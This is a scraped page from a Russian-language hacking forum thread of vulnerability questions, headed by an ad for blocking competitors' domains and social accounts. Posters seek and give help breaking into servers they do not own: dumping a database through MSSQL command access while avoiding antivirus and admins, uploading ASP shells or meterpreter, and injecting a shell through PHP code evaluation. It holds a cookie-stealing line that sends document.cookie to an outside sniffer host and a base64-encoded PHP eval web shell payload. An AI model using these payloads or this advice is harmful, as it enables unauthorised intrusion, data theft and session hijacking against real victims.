УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 2290 из 2438

2290

Опции темы

Поиск в этой теме

Опции просмотра

#22891

22.10.2013, 21:45

cyborgx

Guest

Сообщений: n/a

Провел на форуме:
768

Репутация: 0

/////

#22892

23.10.2013, 11:34

qaz

Guest

Сообщений: n/a

Провел на форуме:
344922

Репутация: 75

Цитата:

Сообщение от cyborgx

cyborgx said:
Пробую, не радиктируется, потому что прав нет?

ща напрегу свои екстрасенсорные способности и скажу... yfdthyj

Цитата:

Сообщение от cyborgx

cyborgx said:
И есть ли возможность где-то изменить его, чтобы получить права?

порутать сервак

Цитата:

Сообщение от cyborgx

cyborgx said:
И если попадется с правами, то как именно отредактировать и сохранить, по умолчанию редактировать index?

сам пониаешь что спрашиваешь?

Цитата:

Сообщение от cyborgx

cyborgx said:
а как сохранить? Есть какие-то команды или кнопки для етого?

да, там пот кодом который редактируешь есть кнопка save!!!!

неужели так сложно разуть глаза и если что-то непонятно то методом тыка попробовать?

#22893

23.10.2013, 12:09

winstrool

Познающий

Регистрация: 06.03.2007

Сообщений: 59

Провел на форуме:
371875

Репутация: 137

Цитата:

Сообщение от cyborgx

cyborgx said:
И есть ли возможность где-то изменить его, чтобы получить права?

Может вам это поможет?!

/showpost.php?p=3382514&postcount=1

#22894

23.10.2013, 18:44

xdzolax

Новичок

Регистрация: 15.05.2010

Сообщений: 0

Провел на форуме:
4643

Репутация: 0

посоветуйте куда копать. получил доступ к cmd через microsoft sql. но сервер очень медленный (вывод результата любой команды занимет часы, а если инфы много, то может занять и дни), сервер тормознутый, а бд очень большие.

цель пока что - слить бд.

что приходит в голову:

1. создать файл, и вставить в него код какого-либо шелла. но как узнать диру, куда заливать, чтобы запустить шелл из веба (пробовал для этого найти ошибки в asp, не получилось).

2. пытаться создать пользователя с админ права, открыть нужный порт и коннектиться к серву удаленно.

3. пытаться залить реверс-шелл (meterpreter) и работать с ним.

в каком направлении вы бы посоветовали двигаться? важно, чтобы шанс быть спаленым av или админом был минимальным.

инфа о системе - ASP.NET, Microsoft IIS 7.5, Server 2008.

#22895

24.10.2013, 10:57

-=Cerberus=-

Guest

Сообщений: n/a

Провел на форуме:
343026

Репутация: 391

xdzolax

ищи админку, заливай asp(лучше на VisualScript написанном) шелл или пробуй через скулю использовать meterpremer, шелл аналогично asp, с путями куда разрешена запись придется экспериментировать(к примеру C:\Windows\Temp)

как то так

#22896

24.10.2013, 15:10

Brooklyn111

Guest

Сообщений: n/a

Провел на форуме:
10188

Репутация: 0

посоветуйте пожалуйста, ситуация такая, есть проект, в нем найдена уязвимость Remote Code (PHP) Evaluation,

предполагаю, что возможно вместо этого кода внести шелл код, форма ввода на странице

объясните пожалуйста какой код, как, и куда его можно вставить для внедрения шелла.

заранее благодарен!

#22897

24.10.2013, 18:29

BigBear

Новичок

Регистрация: 04.12.2008

Сообщений: 11

Провел на форуме:
69033

Репутация: 8

Цитата:

Сообщение от Brooklyn111

Brooklyn111 said:
посоветуйте пожалуйста, ситуация такая, есть проект, в нем найдена уязвимость Remote Code (PHP) Evaluation,

предполагаю, что возможно вместо этого кода внести шелл код, форма ввода на странице

объясните пожалуйста какой код, как, и куда его можно вставить для внедрения шелла.
заранее благодарен!

Мелкие изображения. Залей на ФО и дай ссылку.

#22898

24.10.2013, 19:04

Brooklyn111

Guest

Сообщений: n/a

Провел на форуме:
10188

Репутация: 0

Цитата:

Сообщение от BigBear

BigBear said:
Мелкие изображения. Залей на ФО и дай ссылку.

http://www.sendspace.com/filegroup/W5fLL1KrrODv2bgPBU44mg

#22899

24.10.2013, 21:53

djhovo09

Guest

Сообщений: n/a

Провел на форуме:
943

Репутация: 0

здравствуйте , я хочу украсть куки через йфраме ,но не получается потому что кукиси на втором домене

[/QUOTE]

img.src="http://snifer.ejan.ru/img.php?"+document.cookie;

Цитата:

Сообщение от None

помогите разобраться

#22900

24.10.2013, 22:03

noviks

Guest

Сообщений: n/a

Провел на форуме:
4709

Репутация: 0

всем привет,у меня вот такой вопрос есть сайт site.ru/account?mode=data:;base64,PD9waHAgZXZhbCgkX0dFVFtj bWRdKTsgPz4==&cmd=phpinfo();

как я понял есть локальный инклуд ,но вот как дальше ./../../ так не пролазиет ,если кодировать в base64 ,то просто вверу сайта выводится ./../../ сколько бы не вводил

Страница 2290 из 2438

2290

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход